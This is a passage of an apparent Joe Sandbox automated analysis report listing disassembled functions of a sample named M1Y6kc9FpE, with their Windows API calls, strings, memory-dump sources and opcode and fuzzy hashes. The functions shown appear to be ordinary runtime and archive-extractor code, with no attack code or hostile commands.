                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                      • Opcode ID: 593128ecd8b17d6eafa308857e5f7ffa10857078406d12ae557f25ff70c5c794
                                                                                                                                                      • Instruction ID: 8b5f555eae3a48efdbe5bfbdd280eeb90b7552c5dbd3525ed3321fd05bea41d7
                                                                                                                                                      • Opcode Fuzzy Hash: 593128ecd8b17d6eafa308857e5f7ffa10857078406d12ae557f25ff70c5c794
                                                                                                                                                      • Instruction Fuzzy Hash: D401A4361447017BC322B7B46E86F2B257EFBC13737220124FD09A71D2EEB0880E9120
                                                                                                                                                      Function 00A534AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00A534C7
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A534D9
                                                                                                                                                      • _free.LIBCMT ref: 00A534EB
                                                                                                                                                      • _free.LIBCMT ref: 00A534FD
                                                                                                                                                      • _free.LIBCMT ref: 00A5350F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 9198fe552ba4c5d2b578202e9bac6ecf76620f9fa218183bde5be2a7557b1487
                                                                                                                                                      • Instruction ID: 33b938440334476342c493634de260a558c737e08ddb7b89d49dae4db0d871ef
                                                                                                                                                      • Opcode Fuzzy Hash: 9198fe552ba4c5d2b578202e9bac6ecf76620f9fa218183bde5be2a7557b1487
                                                                                                                                                      • Instruction Fuzzy Hash: 47F01273504200AB8A20DB98F686C1B77FDBB807A27590805FC49EB901DBB1FD84CB60
                                                                                                                                                      Function 00A4F7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00A4F7DE
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A4F7F0
                                                                                                                                                      • _free.LIBCMT ref: 00A4F803
                                                                                                                                                      • _free.LIBCMT ref: 00A4F814
                                                                                                                                                      • _free.LIBCMT ref: 00A4F825
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 6e4e0d2acaec066ec0e763c4fc62f185c57f1198aad96e7280bff2e94fbf5e04
                                                                                                                                                      • Instruction ID: 16a7f25be6c76acc500654dcd011dbd3549e237b52b4ecb31da0a030ee6e941c
                                                                                                                                                      • Opcode Fuzzy Hash: 6e4e0d2acaec066ec0e763c4fc62f185c57f1198aad96e7280bff2e94fbf5e04
                                                                                                                                                      • Instruction Fuzzy Hash: F8F05E75800B208FD616EFA4BD029193BA5F7147BB301411AF81DAE275C7B69887CB81
                                                                                                                                                      Function 00A42F8D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 350COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A431A4
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                      • String ID: .lnk$0$lnk
                                                                                                                                                      • API String ID: 176396367-906397761
                                                                                                                                                      • Opcode ID: 48037d73ba75c0dfd961157c7fc9d69356c4422c4bd57e1f804fc9343425c4bf
                                                                                                                                                      • Instruction ID: 5d13e29fd3178275851aa3bef33bb3ffe268fee3777e33295e64e54d9631e6ec
                                                                                                                                                      • Opcode Fuzzy Hash: 48037d73ba75c0dfd961157c7fc9d69356c4422c4bd57e1f804fc9343425c4bf
                                                                                                                                                      • Instruction Fuzzy Hash: 8AE14876D002689FDF24DBA8DD85BDDB7B8BF58300F5005AAE509A7141DB74AB88CF60
                                                                                                                                                      Function 00A42B26 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 291COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00A42B66
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A30BF3: _wcslen.LIBCMT ref: 00A30C03
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A42EDA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$DialogPathTemp
                                                                                                                                                      • String ID: $@set:user
                                                                                                                                                      • API String ID: 2172748170-1503366402
                                                                                                                                                      • Opcode ID: e7b5d7bb76790d1bd9d608667686a020148f9928a79ed90b071f98844935457c
                                                                                                                                                      • Instruction ID: 91864b3c83a3b7b76010afef22a56d3788d25cec54945d4228042d4d6c89b1bd
                                                                                                                                                      • Opcode Fuzzy Hash: e7b5d7bb76790d1bd9d608667686a020148f9928a79ed90b071f98844935457c
                                                                                                                                                      • Instruction Fuzzy Hash: 83C17C70C012A99FDF24EBA8DD45BDDBBB4AF65300F4440AAE409B7152DBB05B89CF60
                                                                                                                                                      Function 00A41F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A31309: __EH_prolog3.LIBCMT ref: 00A31310
                                                                                                                                                        • Part of subcall function 00A31309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
                                                                                                                                                        • Part of subcall function 00A31AD1: __EH_prolog3_GS.LIBCMT ref: 00A31AD8
                                                                                                                                                        • Part of subcall function 00A2F763: __EH_prolog3_GS.LIBCMT ref: 00A2F76A
                                                                                                                                                        • Part of subcall function 00A2F58B: __EH_prolog3_GS.LIBCMT ref: 00A2F592
                                                                                                                                                        • Part of subcall function 00A2F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00A2A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00A2F5A8
                                                                                                                                                        • Part of subcall function 00A2F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F5EB
                                                                                                                                                      • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00A42137
                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A422BE
                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00A422D8
                                                                                                                                                        • Part of subcall function 00A314CC: __EH_prolog3_GS.LIBCMT ref: 00A314D3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                                                                                                                      • String ID: .tmp
                                                                                                                                                      • API String ID: 1688541384-2986845003
                                                                                                                                                      • Opcode ID: f9c5bdef4de90bb9c075db7815958c43eb48ab899f9bcf5fd2b209eedcb663b3
                                                                                                                                                      • Instruction ID: 69381255a4e6302ad33287d0ba67dfcd187b60a81ecda9fc1c95b6005b6428c8
                                                                                                                                                      • Opcode Fuzzy Hash: f9c5bdef4de90bb9c075db7815958c43eb48ab899f9bcf5fd2b209eedcb663b3
                                                                                                                                                      • Instruction Fuzzy Hash: 83C1E275C002689ADF25DFA8DD84BDDB7B8BF58300F9041EAE449A3241DB346B89CF61
                                                                                                                                                      Function 00A2A300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2A307
                                                                                                                                                      • GetLastError.KERNEL32(00000054,?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2A427
                                                                                                                                                        • Part of subcall function 00A2AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A2AC2E
                                                                                                                                                        • Part of subcall function 00A2AC11: GetLastError.KERNEL32 ref: 00A2AC72
                                                                                                                                                        • Part of subcall function 00A2AC11: CloseHandle.KERNEL32(?), ref: 00A2AC81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                      • API String ID: 2235100918-639343689
                                                                                                                                                      • Opcode ID: 311cf9d60b924ec14c7238af7d0f0b57021918cd00cbafcabc00920683f5e190
                                                                                                                                                      • Instruction ID: 06f86defccca8d94fc3525c7aee26f5a5a3661ebacea62190f01bb87a94a1ad3
                                                                                                                                                      • Opcode Fuzzy Hash: 311cf9d60b924ec14c7238af7d0f0b57021918cd00cbafcabc00920683f5e190
                                                                                                                                                      • Instruction Fuzzy Hash: 7F415C75E00218AFDF14EBECF985BEDB7B9AF58314F04402AF501B7241DBB499458B26
                                                                                                                                                      Function 00A49E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A49E7B
                                                                                                                                                      • _abort.LIBCMT ref: 00A49F86
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EncodePointer_abort
                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                      • API String ID: 948111806-2084237596
                                                                                                                                                      • Opcode ID: 5e140610f06f872f79db95218327fe4b89903babfa545c79934947ddb40168d7
                                                                                                                                                      • Instruction ID: df8080719c5ac5d78a7bfce356167abfc6a99de0bf6ce938dd5312142a5521a5
                                                                                                                                                      • Opcode Fuzzy Hash: 5e140610f06f872f79db95218327fe4b89903babfa545c79934947ddb40168d7
                                                                                                                                                      • Instruction Fuzzy Hash: 6F413575900209AFCF16DF98C981AAFBBB5BF88304F188199FA04A6261D335A961DB51
                                                                                                                                                      Function 00A3338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __fprintf_l.LIBCMT ref: 00A3340E
                                                                                                                                                      • _strncpy.LIBCMT ref: 00A33459
                                                                                                                                                        • Part of subcall function 00A389ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00A6E088,?,00000007,00A333E2,?,?,00000050,5C02E116), ref: 00A38A0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                      • String ID: $%s$@%s
                                                                                                                                                      • API String ID: 562999700-834177443
                                                                                                                                                      • Opcode ID: d789ce075c9583e90617a931c1ef55afcaa02551c1a7a3adf8dec161d1bbaed4
                                                                                                                                                      • Instruction ID: 42547bab3c6ae17c9161ba28d64838df79128da04070e91eac52ddb246440472
                                                                                                                                                      • Opcode Fuzzy Hash: d789ce075c9583e90617a931c1ef55afcaa02551c1a7a3adf8dec161d1bbaed4
                                                                                                                                                      • Instruction Fuzzy Hash: 0D215973A04709ABDB11DFA8CD85EAE7BB8BB04311F044526FA10DB291D775EA158B60
                                                                                                                                                      Function 00A3F8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3F8F7
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A3F99F
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00A3F9E1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$DialogH_prolog3_Window
                                                                                                                                                      • String ID: ASKNEXTVOL
                                                                                                                                                      • API String ID: 2321058237-3402441367
                                                                                                                                                      • Opcode ID: 34ee0e8a9c658c55fcc85664b0dda330cdcf8987d398de4b577e1a9b3370cf6c
                                                                                                                                                      • Instruction ID: 5226a06e21e53fb59a3557b1ea35f6c5e666b36a9df058cc026af78997c31362
                                                                                                                                                      • Opcode Fuzzy Hash: 34ee0e8a9c658c55fcc85664b0dda330cdcf8987d398de4b577e1a9b3370cf6c
                                                                                                                                                      • Instruction Fuzzy Hash: FD217C31A50214BFDB14EFB8DD4AFAE37A8BF1A300F104034F9459B2A5C771AA05DB62
                                                                                                                                                      Function 00A37445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000,00A3ABB6,?), ref: 00A37484
                                                                                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000), ref: 00A3748E
                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000), ref: 00A3749E
                                                                                                                                                      Strings
                                                                                                                                                      • Thread pool initialization failed., xrefs: 00A374B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                      • Opcode ID: 1eb3c362c4a5b385b9195d8ee9c352c739c29f570639ffa371689ac3c6c58346
                                                                                                                                                      • Instruction ID: c4b029df5338cf3db2fbadf5f76633e2c93516bedce0d523cb18c92d3a224a03
                                                                                                                                                      • Opcode Fuzzy Hash: 1eb3c362c4a5b385b9195d8ee9c352c739c29f570639ffa371689ac3c6c58346
                                                                                                                                                      • Instruction Fuzzy Hash: EB1191F1644709AFC3319F6A9C849ABFBECFB54754F10082EF1DAC2200D6B069808B60
                                                                                                                                                      Function 00A4406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 0-56093855
                                                                                                                                                      • Opcode ID: c5e4f7ee5e42591d2fa7ed62c6ffb838f25121113812f417212993446b55784d
                                                                                                                                                      • Instruction ID: 2082fdbd6e9ff5f9957b9cb224baaf2f9712201d9e8f54d65353545c03f7b582
                                                                                                                                                      • Opcode Fuzzy Hash: c5e4f7ee5e42591d2fa7ed62c6ffb838f25121113812f417212993446b55784d
                                                                                                                                                      • Instruction Fuzzy Hash: 3B11A539705344AFD710CFA9EC44A167BE8F7CD392B048829F549C3620C3B19896EF62
                                                                                                                                                      Function 00A4A892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A4A843,00000000,?,00A76150,?,?,?,00A4A9E6,00000004,InitializeCriticalSectionEx,00A5F7F4,InitializeCriticalSectionEx), ref: 00A4A89F
                                                                                                                                                      • GetLastError.KERNEL32(?,00A4A843,00000000,?,00A76150,?,?,?,00A4A9E6,00000004,InitializeCriticalSectionEx,00A5F7F4,InitializeCriticalSectionEx,00000000,?,00A4A79D), ref: 00A4A8A9
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A4A8D1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                                      • Opcode ID: 4c2e579f761fb8fbf423d7a2bb4964bc03decc89c55e8e315655f4cc88073501
                                                                                                                                                      • Instruction ID: aa87f411f0f455e6c21d1b79ff6ef5190005fbe6c2e0da7c2e3b7bff827b6bb9
                                                                                                                                                      • Opcode Fuzzy Hash: 4c2e579f761fb8fbf423d7a2bb4964bc03decc89c55e8e315655f4cc88073501
